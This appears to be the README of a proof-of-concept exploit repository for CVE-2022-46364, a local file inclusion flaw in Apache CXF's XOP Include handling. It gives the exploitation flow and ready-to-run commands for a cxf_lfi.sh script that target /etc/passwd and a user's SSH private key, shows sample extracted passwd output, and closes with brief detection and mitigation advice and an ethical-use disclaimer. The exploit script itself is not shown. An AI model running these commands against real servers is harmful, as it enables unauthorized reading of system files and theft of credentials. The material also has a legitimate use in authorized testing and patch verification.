## https://sploitus.com/exploit?id=2B6C4BC9-E4E5-57A7-844D-6BD111631E2A
# Apache CXF XOP Include LFI (CVE-2022-46364)
## Overview
This repository contains a Proof-of-Concept (PoC) exploit for **CVE-2022-46364**, a Local File Inclusion (LFI) vulnerability in Apache CXF.
The vulnerability arises due to improper handling of **XOP (XML-binary Optimized Packaging) Include** elements in SOAP requests, allowing attackers to read arbitrary files from the server.
---
## Vulnerability Details
* **CVE ID:** CVE-2022-46364
* **Component:** Apache CXF
* **Vulnerability Type:** Local File Inclusion (LFI)
* **Attack Vector:** Remote (unauthenticated in some cases)
* **Impact:** Arbitrary file read on the server
### Root Cause
Apache CXF improperly processes `` elements inside SOAP requests.
By supplying a crafted `href` (e.g., `file:///etc/passwd`), the server may include and return local file contents.
---
## Affected Versions
* Apache CXF versions **prior to the patched release (3.4.x / 3.5.x depending on branch)**
> Always verify the exact vulnerable version in your target environment.
---
## Exploitation Flow
1. Attacker sends a crafted SOAP request
2. Includes ``
3. Server processes the request and reads the local file
4. File content is returned inside the SOAP response
---
## Repository Structure
```bash
.
โโโ cxf_lfi.sh # Exploit script
โโโ README.md # Documentation
โโโ LICENSE # MIT License
โโโ .gitignore
```
---
## Requirements
* Bash
* curl
* base64 (optional, for decoding output)
---
## Usage
### 1. Make script executable
```bash
chmod +x cxf_lfi.sh
```
### 2. Edit target URL
Update the target inside the script:
```bash
TARGET="http://:8080/employeeservice"
```
### 3. Run exploit
```bash
./cxf_lfi.sh file:///etc/passwd
```
---
## Example Attacks
### Example 1: Read system users
```bash
./cxf_lfi.sh file:///etc/passwd
```
### Example 2: Read application secrets
```bash
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
```
---
## Sample Output
```bash
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
```
---
## Notes & Limitations
* Some servers may:
* Return **base64-encoded content**
* Restrict file access via permissions
* Sanitize or block `file://` schemes
* Output parsing depends on response format and may require manual inspection.
---
## Detection & Mitigation
### Detection
* Monitor unusual SOAP requests containing:
* ``
* `file://` URIs
### Mitigation
* Upgrade Apache CXF to a patched version
* Disable or restrict XOP processing if not required
* Validate and sanitize incoming SOAP payloads
---
## Ethical Use Disclaimer
This project is intended for:
* Educational purposes
* Authorized penetration testing
Do **not** use this tool on systems without explicit permission.
---
## References
* Apache CXF Security Advisories
* CVE Database (CVE-2022-46364)
---
## Author
Developed as part of security research and CTF practice.